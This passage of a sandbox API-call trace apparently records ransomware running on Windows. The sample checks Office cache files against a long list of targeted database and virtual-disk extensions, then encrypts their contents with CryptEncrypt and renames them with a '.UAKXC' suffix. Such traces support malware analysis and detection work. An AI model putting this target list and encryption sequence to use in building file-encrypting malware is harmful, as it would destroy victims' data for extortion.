(lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rpd") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".rsd") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sbf") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".scx") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sdb") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sdc") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sdf") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sis") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".spq") returned 0x0 [0151.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sql") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sqlite") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sqlite3") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".te") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".temx") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".tmd") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".tps") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".trc") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".trm") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".udb") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".udl") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".usr") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".v12") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vis") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vpd") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vvv") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".wdb") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".wmdb") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".wrk") returned 0x0 [0151.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".xdb") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".xld") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".xmlff") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".abcddb") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".abs") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".abx") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".accdw") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".adn") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".db2") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".fm5") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".hjt") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".icg") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".icr") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".kdb") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".lut") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".maw") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mdn") returned 0x0 [0151.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".mdt") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vdi") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vhd") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmdk") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".pvm") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmem") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmsn") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmsd") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".nvram") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmx") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".raw") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".qcow2") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".subvol") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".bin") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vsv") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".avhd") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmrs") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vhdx") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".avdx") returned 0x0 [0151.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".vmcx") returned 0x0 [0151.275] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".iso") returned 0x0 [0151.275] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.275] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0154.036] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0154.037] SetEndOfFile (hFile=0x6f0) returned 1 [0154.038] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.038] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0xc72, lpOverlapped=0x0) returned 1 [0154.038] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.038] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0xc72, lpOverlapped=0x0) returned 1 [0154.039] CloseHandle (hObject=0x6f0) returned 1 [0154.043] GetProcessHeap () returned 0xea0000 [0154.043] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0154.043] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0154.043] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.UAKXC" [0154.043] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.uakxc")) returned 1 [0154.046] GetProcessHeap () returned 0xea0000 [0154.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0154.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5a10 | out: hHeap=0xea0000) returned 1 [0154.046] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeace0 | out: hHeap=0xea0000) returned 1 [0154.046] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0154.046] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0154.046] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0154.047] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0154.048] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0154.048] GetLastError () returned 0x0 [0154.048] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=4207) returned 1 [0154.048] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0154.048] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0154.048] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0154.048] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0154.049] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0154.050] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0154.051] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0154.052] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0154.053] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0154.053] StrStrIW 